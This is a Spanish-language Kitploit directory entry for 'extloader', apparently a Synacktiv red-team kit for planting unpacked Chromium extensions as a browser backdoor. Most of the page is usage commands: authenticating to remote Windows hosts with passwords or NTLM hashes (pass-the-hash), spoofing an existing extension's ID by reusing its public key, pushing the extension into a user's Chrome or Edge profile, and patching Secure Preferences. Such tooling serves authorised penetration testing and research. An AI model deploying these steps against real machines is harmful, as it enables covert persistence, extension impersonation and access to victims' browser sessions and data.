Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/synacktiv/extloader
Mecanismos de PersistenciaExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPost-ExplotaciónPruebas de PenetraciónRed Teaming
GitHubsynacktiv/extloader

extloader

Un kit de explotación de extensiones de Chromium

Ver Repositorio
2627hace 11 mesesRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

extLoader

Un pequeño kit de herramientas para gestionar e implementar extensiones de Chromium desempaquetadas.

Obtén más información en el siguiente artículo: https://www.synacktiv.com/en/publications/the-phantom-extension-backdooring-chrome-through-uncharted-pathways

Instalación

Instalación directa (pipx)

root@kitploit:~
pipx install .
extloader --help

Usa pipx para una instalación aislada dirigida a Python 3.10+.

Configuración de desarrollo (uv)

root@kitploit:~
uv venv
source .venv/bin/activate
uv pip install -e .

Opciones de autenticación

  • Contraseña: -p/--password
Descargar herramienta
  • Hash: -H/--hash (formato LM:NT o solo NT)
  • Dominio: -d/--domain (por defecto WORKGROUP)
  • Parámetros comunes

    • -t, --target: IP/hostname objetivo
    • -u, --username: Nombre de usuario
    • -i, --index: Índice de usuario del comando check
    • --debug: Habilitar registro de depuración

    Uso

    Aquí tienes un ejemplo paso a paso de cómo implementar una extensión:

    1. Primero, comprueba los objetivos disponibles:
    root@kitploit:~
    # This will list available users and browsers
    extloader check -t 192.168.1.100 -u admin -H aad3b435b51404eeaad3b435b51404ee:ntlm_hash -d corp.local
    
    ┏━━━━━━━━┳━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
    ┃ Index  ┃ Browser         ┃ User (SID)                                                   ┃
    ┡━━━━━━━━╇━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┩
    │   1    │ Chrome          │ john.doe (S-1-5-21-4196007090-2879228606-3183820935-1122)    │
    │   2    │ Microsoft Edge  │ john.doe (S-1-5-21-4196007090-2879228606-3183820935-1122)    │
    └────────┴─────────────────┴──────────────────────────────────────────────────────────────┘
    

    Cuando ejecutes el exploit en una máquina diferente, ejecuta siempre el comando check antes para actualizar el contexto (available_targets.json).

    1. Prepara el manifiesto (firma o suplanta un ID):
    root@kitploit:~
    # Create a deterministic crx_id by adding a key to the manifest.json
    extloader sign --extension ./my-extension
    

    Para suplantar un ID de extensión existente, omite el comando anterior y establece la key del manifiesto con la clave pública base64 de la extensión que estás imitando. Reutilizar esa clave mantiene el ID CRX sin cambios.

    1. Implementa la extensión:
    root@kitploit:~
    # Deploy to user index 1 (Chrome of john.doe)
    extloader exploit -t 192.168.1.100 -u admin -H ntlm_hash -i 1 --extension ./my-extension
    

    4.(Alternativa) Empaqueta para implementación manual:

    root@kitploit:~
    # Bundle the signed extension with the captured Preferences file
    extloader package --prefs-file "Preferences" --extension-dir ./my-extension --target-dir "C:\\Users\\Public"
    
    # This creates a ZIP containing:
    # - Signed extension files
    # - Updated preferences files
    # - Deployment instructions
    

    --prefs-file espera las preferencias del perfil del navegador que hayas respaldado (Chrome/Edge las almacenan como Secure Preferences, otros navegadores Chromium usan Preferences). El cargador las copia, las parchea e incluye tanto las versiones modificadas como las intactas en el paquete.

    root@kitploit:~
    ├── extension/
    │   └── chrome-mv3/
    ├── preferences/
    │   ├── brave/
    │   ├── chrome/
    │   ├── chromium/
        [...]
    └── info.json
    
    1. Restaura las preferencias originales si es necesario:
    root@kitploit:~
    # Restore original preferences for user index 1 (need check command to get the correct context)
    extloader restore -t 192.168.1.100 -u admin -H ntlm_hash -i 1 -f ./backup_preferences
    

    Pendientes

    • Soporte Kerberos
    • Módulo nxc
    • Adaptar el flujo de trabajo de package para Linux
    • Adaptar el flujo de trabajo de package para macOS